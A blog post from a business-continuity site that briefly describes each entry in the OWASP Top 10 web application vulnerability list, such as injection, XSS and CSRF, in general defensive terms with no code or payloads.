DRJ's Fall 2018

Conference & Exhibit

Attend The #1 BC/DR Event!

Summer Journal

Volume 31, Issue 2

Full Contents Now Available!

DRJ Blogs

DRJ | The premiere resource for business continuity and disaster recovery

OWASP Top 10 - Combating Data Security Breach in Web Applications

Most of the organizations are now developing and using web applications to do their business online. This shift in the style has undoubtedly eased the way to do the business, but at the same time has exposed critical business and customer data to security threats. Recent report of Verizon Data Breach Investigation (2017) suggests that a good percentage of breaches were associated with web applications.

Some of these threats have now been addressed by various automated scanners which provide a robust detection of security vulnerabilities. However, it is still important to understand such vulnerabilities before we can resolve the danger posed.

Open Web Application Security Project (OWASP) is a group that works towards defining security recommendations, specifications, and explanations in key areas. This group was initially created as a project to define testing standards for web applications security. The specialized project concluded that purchase of dedicated software tools can make the web application immune to security breaches. Apart from this, OWASP published and drafted ‘Top 10 Security Vulnerabilities List’ for any web application.

Soon, the OWASP Top 10 Report, established new benchmarks for web application security. Since 2004, the OWASP Top 10 list is released once in every 3 years. The report is being used by IT auditors across various industries as a definitive checklist to scan the security aspects of web applications. Integrating Top 10 into the application development process ensures adherence to industry security compliances and secures applications from threat actors.

The following top 10 vulnerabilities are from the latest list of 2017:

Injection: Injection flaws occurs when application in vulnerable to a level when untrusted data is sent to an interpreter as part of a command or SQL, OS, and LDAP injection query.

Broken Authentication and Session Management: Stealing the passwords or session tokens and assuming the legitimate users’ identifies are the most common security risks related to authentication and session management.

Cross-Site Scripting (XSS): XSS vulnerability allows an attacker to execute malicious script in a website or web application which is later executed by the victims. Once user executes this scripts it can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Broken Access Control: Applications need to perform the access control checks on GUI as well as on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.

Security  Misconfiguration: Good security requires a secure configuration defined and deployed for application, technology frameworks, application server, web server, database server, and platform. Any loophole in these parameters can invite a serious breach.

Sensitive Data Exposure: Organizations should embrace a layered approach to protect sensitive data, i.e., credit cards, tax ids, and authentication credentials. Threat actors can steal and modify the confidential data if it is weakly protected. It is a strategically wise decision to use secure data transformation solutions for information exchange.

Insufficient Attack Protection: Web applications and APIs are unable to detect, prevent, and respond to both the attacks that are both manual and automated. There should be more frequent deployment of the patches to protect against the attack.

Cross-Site  Request Forgery (CSRF): A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application.

Using Components with Known Vulnerabilities: Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if breached, a serious damages can occur. Applications using these components can undermine defenses and enable a range of possible attacks.

Unprotected APIs: APIs have been exploded in the modern web applications. Variety of APIs protocol include SOAP/XML, REST/JSON, GWT, RPC, and others. These APIs are often not protected and may contain many vulnerabilities.

OWASP Top 10 list helps building a web application that is highly secured. If these vulnerabilities are considered earlier, then developed  web products can mitigate any incident of serious breach. Additionally, there are several long term benefits if this practice is absorbed in Software Development Life Cycle (SDLS) and developers are trained to write codes in line with this list.

Disaster Recovery Planning: Who Needs A Seat At Th...
Secure Documents with Shield